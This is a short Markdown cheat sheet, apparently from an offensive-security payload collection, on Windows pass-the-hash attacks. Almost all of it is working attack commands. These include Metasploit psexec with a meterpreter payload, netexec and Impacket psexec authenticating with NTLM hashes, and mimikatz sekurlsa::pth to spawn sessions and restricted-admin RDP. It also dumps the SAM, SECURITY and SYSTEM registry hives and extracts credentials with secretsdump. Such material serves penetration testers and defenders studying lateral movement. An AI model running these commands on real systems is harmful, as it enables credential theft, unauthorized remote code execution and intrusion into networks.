43 lines
1.6 KiB
Markdown
43 lines
1.6 KiB
Markdown
# Hash - Pass-the-Hash
|
||
|
||
The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500.
|
||
|
||
* Metasploit
|
||
```powershell
|
||
use exploit/windows/smb/psexec
|
||
set RHOST 10.2.0.3
|
||
set SMBUser jarrieta
|
||
set SMBPass nastyCutt3r
|
||
# NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
|
||
# NOTE2: Require the full NT hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
|
||
set PAYLOAD windows/meterpreter/bind_tcp
|
||
run
|
||
shell
|
||
```
|
||
* netexec
|
||
```powershell
|
||
nxc smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
|
||
```
|
||
* Impacket suite
|
||
```powershell
|
||
proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d
|
||
```
|
||
* Windows RDP and mimikatz
|
||
```powershell
|
||
sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:b73fdfe10e87b4ca5c0d957f81de6863
|
||
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the users ntlm hash> /run:"mstsc.exe /restrictedadmin"
|
||
```
|
||
|
||
You can extract the local **SAM database** to find the local administrator hash :
|
||
|
||
```powershell
|
||
C:\> reg.exe save hklm\sam c:\temp\sam.save
|
||
C:\> reg.exe save hklm\security c:\temp\security.save
|
||
C:\> reg.exe save hklm\system c:\temp\system.save
|
||
$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
|
||
```
|
||
|
||
|
||
## References
|
||
|
||
* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/) |